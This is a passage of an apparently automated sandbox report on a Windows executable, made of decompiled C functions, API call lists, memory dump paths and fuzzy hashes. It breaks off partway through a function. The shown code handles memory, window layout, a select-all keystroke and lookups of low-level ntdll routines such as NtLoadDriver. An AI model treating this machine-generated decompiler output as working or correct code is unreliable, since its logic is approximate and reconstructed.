                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 975042529-0
                                                                                      • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                      • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                      0x004097b1
                                                                                      0x004097b9
                                                                                      0x004097bb
                                                                                      0x004097be
                                                                                      0x004097c3
                                                                                      0x004097ca
                                                                                      0x004097de
                                                                                      0x004097de
                                                                                      0x004097e3
                                                                                      0x004097e5
                                                                                      0x004097e5
                                                                                      0x004097ec
                                                                                      0x004097f3
                                                                                      0x004097f6
                                                                                      0x004097fe
                                                                                      0x00409802
                                                                                      0x00409805
                                                                                      0x0040980a
                                                                                      0x0040980d
                                                                                      0x00409810
                                                                                      0x00409822
                                                                                      0x00000000
                                                                                      0x00409827
                                                                                      0x0040982a
                                                                                      0x004098da
                                                                                      0x004098da
                                                                                      0x004098dc
                                                                                      0x004098e0
                                                                                      0x004098e9
                                                                                      0x004098ec
                                                                                      0x004098f6
                                                                                      0x004098f6
                                                                                      0x004098e2
                                                                                      0x00000000
                                                                                      0x004098e2
                                                                                      0x00409830
                                                                                      0x00409833
                                                                                      0x00409838
                                                                                      0x0040983b
                                                                                      0x0040983e
                                                                                      0x0040985f
                                                                                      0x0040985f
                                                                                      0x00409861
                                                                                      0x00409863
                                                                                      0x0040989e
                                                                                      0x004098b1
                                                                                      0x004098b8
                                                                                      0x004098c0
                                                                                      0x004098c5
                                                                                      0x004098d5
                                                                                      0x00409865
                                                                                      0x00409865
                                                                                      0x00409865
                                                                                      0x0040986c
                                                                                      0x00409878
                                                                                      0x0040987f
                                                                                      0x0040988a
                                                                                      0x0040988f
                                                                                      0x0040988f
                                                                                      0x0040986c
                                                                                      0x00000000
                                                                                      0x00409863
                                                                                      0x00409840
                                                                                      0x00409843
                                                                                      0x00409846
                                                                                      0x0040984b
                                                                                      0x00409852
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409854
                                                                                      0x0040985d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040985d
                                                                                      0x00409894
                                                                                      0x00000000
                                                                                      0x00409894

                                                                                      APIs
                                                                                        • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                      • memset.MSVCRT ref: 00409805
                                                                                      • memcpy.MSVCRT ref: 0040988A
                                                                                      • memcpy.MSVCRT ref: 004098C0
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                      • String ID:
                                                                                      • API String ID: 3641025914-0
                                                                                      • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                      • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 68%
                                                                                      			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                      0x004067ac
                                                                                      0x004067af
                                                                                      0x004067b5
                                                                                      0x004067ba
                                                                                      0x004067bf
                                                                                      0x004067c1
                                                                                      0x004067c6
                                                                                      0x004067c7
                                                                                      0x004067cc
                                                                                      0x004067cd
                                                                                      0x004067d2
                                                                                      0x004067d4
                                                                                      0x004067d9
                                                                                      0x004067da
                                                                                      0x004067df
                                                                                      0x004067e0
                                                                                      0x004067e5
                                                                                      0x004067e7
                                                                                      0x004067ec
                                                                                      0x004067ed
                                                                                      0x004067f2
                                                                                      0x004067f3
                                                                                      0x004067f8
                                                                                      0x004067fa
                                                                                      0x004067ff
                                                                                      0x00406800
                                                                                      0x00406805
                                                                                      0x00406806
                                                                                      0x00406808
                                                                                      0x0040680f
                                                                                      0x00406810
                                                                                      0x00406812
                                                                                      0x00406817
                                                                                      0x0040681e
                                                                                      0x00406828
                                                                                      0x0040682b
                                                                                      0x0040682c
                                                                                      0x0040681e
                                                                                      0x00406835
                                                                                      0x00406839
                                                                                      0x00406841

                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                      • free.MSVCRT(00000000), ref: 00406839
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@$free
                                                                                      • String ID:
                                                                                      • API String ID: 2241099983-0
                                                                                      • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                      • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                      0x00405d03
                                                                                      0x00405d06
                                                                                      0x00405d10
                                                                                      0x00405d17
                                                                                      0x00405d22
                                                                                      0x00405d32
                                                                                      0x00405d40
                                                                                      0x00405d48
                                                                                      0x00405d4e
                                                                                      0x00405d54
                                                                                      0x00405d59
                                                                                      0x00405d5c
                                                                                      0x00405d61
                                                                                      0x00405d67

                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00405D0A
                                                                                      • GetWindowRect.USER32 ref: 00405D17
                                                                                      • GetClientRect.USER32 ref: 00405D22
                                                                                      • MapWindowPoints.USER32 ref: 00405D32
                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4247780290-0
                                                                                      • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                      • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                      0x004083dc
                                                                                      0x004083e2
                                                                                      0x004083e9
                                                                                      0x004083ea
                                                                                      0x004083eb
                                                                                      0x004083f3
                                                                                      0x004083f6
                                                                                      0x004083f8
                                                                                      0x00408401
                                                                                      0x00408404
                                                                                      0x00408407
                                                                                      0x00408409
                                                                                      0x0040840c
                                                                                      0x00408413
                                                                                      0x0040841d
                                                                                      0x00408427
                                                                                      0x0040842c
                                                                                      0x0040842f
                                                                                      0x00408432
                                                                                      0x00408435
                                                                                      0x00408438
                                                                                      0x00408439
                                                                                      0x0040843e
                                                                                      0x0040843f
                                                                                      0x00408442
                                                                                      0x0040844a

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy$??2@??3@
                                                                                      • String ID:
                                                                                      • API String ID: 1252195045-0
                                                                                      • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                      • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 76%
                                                                                      			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                      0x00406746
                                                                                      0x00406746
                                                                                      0x0040674f
                                                                                      0x00406751
                                                                                      0x00406752
                                                                                      0x00406757
                                                                                      0x00406758
                                                                                      0x0040675d
                                                                                      0x0040675f
                                                                                      0x00406760
                                                                                      0x00406765
                                                                                      0x00406766
                                                                                      0x0040676e
                                                                                      0x00406770
                                                                                      0x00406771
                                                                                      0x00406776
                                                                                      0x00406777
                                                                                      0x0040677f
                                                                                      0x00406781
                                                                                      0x00406785
                                                                                      0x00406787
                                                                                      0x00406788
                                                                                      0x0040678e
                                                                                      0x0040678e
                                                                                      0x00406790
                                                                                      0x00406791
                                                                                      0x00406796
                                                                                      0x00406798
                                                                                      0x0040679e
                                                                                      0x004067a1
                                                                                      0x004067a4
                                                                                      0x004067ab

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                      • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 87%
                                                                                      			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                      0x0040aba8
                                                                                      0x0040aba9
                                                                                      0x0040abb0
                                                                                      0x0040abb2
                                                                                      0x0040abb5
                                                                                      0x0040ac19
                                                                                      0x0040ac2c
                                                                                      0x0040ac2e
                                                                                      0x0040ac36
                                                                                      0x0040ac39
                                                                                      0x0040ac39
                                                                                      0x0040ac1b
                                                                                      0x0040ac21
                                                                                      0x0040ac21
                                                                                      0x0040abb7
                                                                                      0x0040abcb
                                                                                      0x0040abce
                                                                                      0x0040abd7
                                                                                      0x0040abe6
                                                                                      0x0040abf6
                                                                                      0x0040abfe
                                                                                      0x0040ac09
                                                                                      0x0040ac0f
                                                                                      0x0040ac12
                                                                                      0x0040ac4f

                                                                                      APIs
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                      • String ID: $
                                                                                      • API String ID: 2498372239-3993045852
                                                                                      • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                      • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                      0x00403a7d
                                                                                      0x00403a8c
                                                                                      0x00403a9c
                                                                                      0x00403aba
                                                                                      0x00403adf
                                                                                      0x00403ae7
                                                                                      0x00403af4
                                                                                      0x00403af4
                                                                                      0x00403ae7
                                                                                      0x00403aba
                                                                                      0x00403a9c
                                                                                      0x00403b13

                                                                                      APIs
                                                                                      • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                        • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                      • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: State$CallMessageProcSendWindow
                                                                                      • String ID: A
                                                                                      • API String ID: 3924021322-3554254475
                                                                                      • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                      • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 91%
                                                                                      			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
